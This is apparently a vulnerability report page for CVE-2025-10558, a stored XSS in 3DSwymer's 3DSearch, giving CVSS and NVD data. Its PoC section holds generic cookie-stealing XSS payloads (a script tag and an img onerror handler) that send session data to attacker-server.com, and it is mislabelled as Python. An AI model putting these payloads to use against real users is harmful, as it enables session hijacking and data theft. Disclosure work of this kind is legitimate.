Security Vulnerability Report
中文
CVE-2025-10558 CVSS 8.7 HIGH

CVE-2025-10558

Published: 2025-10-13 08:15:39
Last Modified: 2025-12-04 21:40:10
Source: [email protected]

Description

A stored Cross-site Scripting (XSS) vulnerability affecting 3DSearch in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:* - VULNERABLE
3DEXPERIENCE R2025x(3DSwymer 组件的 3DSearch 功能)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-10558 Stored XSS PoC for 3DSearch in 3DSwymer --> <!-- This PoC demonstrates a stored XSS attack via the 3DSearch functionality --> <!-- Step 1: Attacker logs in with low-privilege account --> <!-- Step 2: Attacker submits a malicious payload through 3DSearch input field --> <!-- Malicious payload example (to be injected into search input or related fields): --> <script> // Steal session cookie and send to attacker's server var cookie = document.cookie; var img = new Image(); img.src = 'https://attacker-server.com/steal?cookie=' + encodeURIComponent(cookie); // Or perform actions on behalf of the victim // fetch('/api/sensitive-endpoint', { credentials: 'include' }) // .then(r => r.json()) // .then(data => { // fetch('https://attacker-server.com/exfil', { // method: 'POST', // body: JSON.stringify(data) // }); // }); </script> <!-- Alternative payload using event handlers --> <img src=x onerror="fetch('https://attacker-server.com/steal?cookie='+document.cookie)"> <!-- Step 3: Malicious payload is stored on the server --> <!-- Step 4: When victim views the search results page, payload executes in their browser --> <!-- Step 5: Attacker receives victim's session data or performs unauthorized actions -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10558", "sourceIdentifier": "[email protected]", "published": "2025-10-13T08:15:39.393", "lastModified": "2025-12-04T21:40:10.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored Cross-site Scripting (XSS) vulnerability affecting 3DSearch in 3DSwymer on Release 3DEXPERIENCE R2025x allows an attacker to execute arbitrary script code in user's browser session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:3ds:3dswymer:r2025x:*:*:*:*:*:*:*", "matchCriteriaId": "DD893EE8-77E1-4790-832D-5AAAB1E8A7F9"}]}]}], "references": [{"url": "https://www.3ds.com/trust-center/security/security-advisories/cve-2025-10558", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.